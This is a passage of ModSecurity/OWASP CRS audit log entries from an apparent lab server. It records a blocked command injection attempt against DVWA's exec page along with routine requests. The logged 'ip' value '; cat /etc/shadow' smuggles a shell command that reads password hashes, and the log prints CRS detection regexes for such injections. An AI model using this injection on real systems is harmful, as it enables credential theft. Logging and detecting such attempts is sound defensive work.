Matched phrase \"etc/shadow\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf\"] [line \"108\"] [id \"930120\"] [rev \"4\"] [msg \"OS File Access Attempt\"] [data \"Matched Data: etc/shadow found within ARGS:ip: '; cat /etc/shadow\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-lfi\"] [tag \"OWASP_CRS/WEB_ATTACK/FILE_INJECTION\"] [tag \"WASCTC/WASC-33\"] [tag \"OWASP_TOP_10/A4\"] [tag \"PCI/6.5.4\"]","Warning. Pattern match \"(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\\".*\\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\\"]*(?:l[\\\\\\\\'\\\"]* ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"81\"] [id \"932100\"] [rev \"4\"] [msg \"Remote Command Execution: Unix Command Injection\"] [data \"Matched Data: ; cat /etc/shadow found within ARGS:ip: '; cat /etc/shadow\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"8\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"]","Warning. Matched phrase \"etc/shadow\" at ARGS:ip. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"448\"] [id \"932160\"] [rev \"1\"] [msg \"Remote Command Execution: Unix Shell Code Found\"] [data \"Matched Data: etc/shadow found within ARGS:ip: cat/etc/shadow\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 18)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=10,PHPI=0,HTTP=0,SESS=0): Remote Command Execution: Unix Shell Code Found\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRcQ2H8AAQEAAAkYuEYAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Matched phrase \"etc/shadow\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf\"] [line \"108\"] [id \"930120\"] [rev \"4\"] [msg \"OS File Access Attempt\"] [data \"Matched Data: etc/shadow found within ARGS:ip: '; cat /etc/shadow\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-lfi\"] [tag \"OWASP_CRS/WEB_ATTACK/FILE_INJECTION\"] [tag \"WASCTC/WASC-33\"] [tag \"OWASP_TOP_10/A4\"] [tag \"PCI/6.5.4\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRcQ2H8AAQEAAAkYuEYAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. 
Pattern match \"(?:;|\\\\\\\\\\\\\\\\{|\\\\\\\\\\\\\\\\||\\\\\\\\\\\\\\\\|\\\\\\\\\\\\\\\\||&|&&|\\\\\\\\\\\\\\\\n|\\\\\\\\\\\\\\\\r|\\\\\\\\\\\\\\\\$\\\\\\\\\\\\\\\\(|\\\\\\\\\\\\\\\\$\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\(|`|\\\\\\\\\\\\\\\\${|<\\\\\\\\\\\\\\\\(|>\\\\\\\\\\\\\\\\(|\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\s*\\\\\\\\\\\\\\\\))\\\\\\\\\\\\\\\\s*(?:{|\\\\\\\\\\\\\\\\s*\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\s*|\\\\\\\\\\\\\\\\w+=(?:[^\\\\\\\\\\\\\\\\s]*|\\\\\\\\\\\\\\\\$.*|\\\\\\\\\\\\\\\\$.*|<.*|>.*|\\\\\\\\\\\\\\\\'.*\\\\\\\\\\\\\\\\'|\\\\\\\\\".*\\\\\\\\\")\\\\\\\\\\\\\\\\s+|!\\\\\\\\\\\\\\\\s*|\\\\\\\\\\\\\\\\$)*\\\\\\\\\\\\\\\\s*(?:'|\\\\\\\\\")*(?:[\\\\\\\\\\\\\\\\?\\\\\\\\\\\\\\\\*\\\\\\\\\\\\\\\\[\\\\\\\\\\\\\\\\]\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\)\\\\\\\\\\\\\\\\-\\\\\\\\\\\\\\\\|+\\\\\\\\\\\\\\\\w'\\\\\\\\\"\\\\\\\\\\\\\\\\./\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\]+/)?[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"]*(?:l[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"]* ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"81\"] [id \"932100\"] [rev \"4\"] [msg \"Remote Command Execution: Unix Command Injection\"] [data \"Matched Data: ; cat /etc/shadow found within ARGS:ip: '; cat /etc/shadow\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"8\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRcQ2H8AAQEAAAkYuEYAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Matched phrase \"etc/shadow\" at ARGS:ip. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"448\"] [id \"932160\"] [rev \"1\"] [msg \"Remote Command Execution: Unix Shell Code Found\"] [data \"Matched Data: etc/shadow found within ARGS:ip: cat/etc/shadow\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRcQ2H8AAQEAAAkYuEYAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 18)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRcQ2H8AAQEAAAkYuEYAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=10,PHPI=0,HTTP=0,SESS=0): Remote Command Execution: Unix Shell Code Found\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRcQ2H8AAQEAAAkYuEYAAAAD\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":486,"p2":2650,"p3":0,"p4":0,"p5":359,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:57:56 --0400","transaction_id":"WRcQ5H8AAQEAAAkZ0A0AAAAE","remote_address":"127.0.0.1","remote_port":41802,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 13:35:49 GMT","If-None-Match":"\"65-54f67e66856bf\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 13:57:53 GMT","ETag":"\"15a-54f683559a2e3\"","Accept-Ranges":"bytes","Content-Length":"346","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRcQ5H8AAQEAAAkZ0A0AAAAE\"]"],"stopwatch":{"p1":727,"p2":1780,"p3":91,"p4":222,"p5":80,"sr":26,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:57:56 --0400","transaction_id":"WRcQ5H8AAQEAAAkZ0A4AAAAE","remote_address":"127.0.0.1","remote_port":41802,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcQ5H8AAQEAAAkZ0A4AAAAE\"]"],"stopwatch":{"p1":612,"p2":1575,"p3":80,"p4":401,"p5":150,"sr":25,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:57:56 --0400","transaction_id":"WRcQ5H8AAQEAAAkZ0A8AAAAE","remote_address":"127.0.0.1","remote_port":41802,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcQ5H8AAQEAAAkZ0A8AAAAE\"]"],"stopwatch":{"p1":629,"p2":1438,"p3":69,"p4":2691,"p5":150,"sr":26,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:10:33:57 --0400","transaction_id":"WRcZVX8AAQEAAAkVV4UAAAAA","remote_address":"127.0.0.1","remote_port":41974,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 14:33:54 GMT","ETag":"\"107-54f68b61bec0e\"","Accept-Ranges":"bytes","Content-Length":"263","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRcZVX8AAQEAAAkVV4UAAAAA\"]"],"stopwatch":{"p1":935,"p2":1365,"p3":65,"p4":148,"p5":56,"sr":50,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:10:33:57 --0400","transaction_id":"WRcZVX8AAQEAAAkVV4YAAAAA","remote_address":"127.0.0.1","remote_port":41974,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcZVX8AAQEAAAkVV4YAAAAA\"]"],"stopwatch":{"p1":589,"p2":1405,"p3":66,"p4":481,"p5":89,"sr":25,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:10:33:57 --0400","transaction_id":"WRcZVX8AAQEAAAkVV4cAAAAA","remote_address":"127.0.0.1","remote_port":41974,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
